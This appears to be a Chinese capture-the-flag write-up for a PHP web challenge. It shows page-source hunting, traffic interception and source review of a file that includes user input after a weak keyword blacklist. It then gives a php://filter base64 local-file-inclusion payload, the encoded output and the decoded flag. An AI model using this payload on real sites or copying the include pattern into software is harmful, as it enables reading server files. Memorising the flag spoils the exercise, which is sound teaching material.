考点分析
本题考察对网络数据包的拦截,php审计,php伪协议
工具链接
解题步骤
(1) 初探网站
打开网站一片漆黑中间几行红色大字
你想知道蒋璐源的秘密么?
想要的话可以给你,去找吧!把一切都放在那里了!
Syclover @ cl4y
难道暗藏玄机? F12 查看
<html><head><style type="text/css">
#master {
position:absolute;
left:44%;
bottom:0;
text-align :center;
}
p,h1 {
cursor: default;
}
</style>
<meta charset="utf-8">
<title>蒋璐源的秘密</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么?</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你,去找吧!把一切都放在那里了!</p>
<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</body></html>
额哈 /Archive_room.php
(2) 顺藤摸瓜
访问../Archive_room.php
网页
网页中有一个鲜红的 SECRET 按钮单机一下
什么?
查阅结束
没看清么?回去再仔细看看吧。
耍我呢?
(3)釜底抽薪
是时候展现我们真正的实力了
上工具Fiddler Classic
再次访问../Archive_room.php
网页
轻松找到 action.php 跑过了和尚跑不过庙 终于抓住你了
点开
<!DOCTYPE html>
<html>
<!--
secr3t.php
-->
</html>
原来元凶在这 => secr3t.php
(4) 直端老巢
访问 ../secr3t.php
源代码出现
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
根据提示直接访问..?file=flag.php
可恶又被耍了
啊哈!你找到我了!可是你看不到我QAQ~~~
我就在这里
(5) 决胜时刻
平复一下心情 喝口柠檬水压压惊
重新再看一遍代码 竟没有过滤file
用上一次同样的套路
php://filter"伪协议” 来进行包含 加上read=convert.base64-encode来对文件内容进行编码
构造payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
返回
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7NTdlN2I4YmMtMjA1ZS00MWIyLTk4MTMtMGRmMjY2MDdkNjc4fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
Base64 解码 得到flag
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{57e7b8bc-205e-41b2-9813-0df26607d678}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>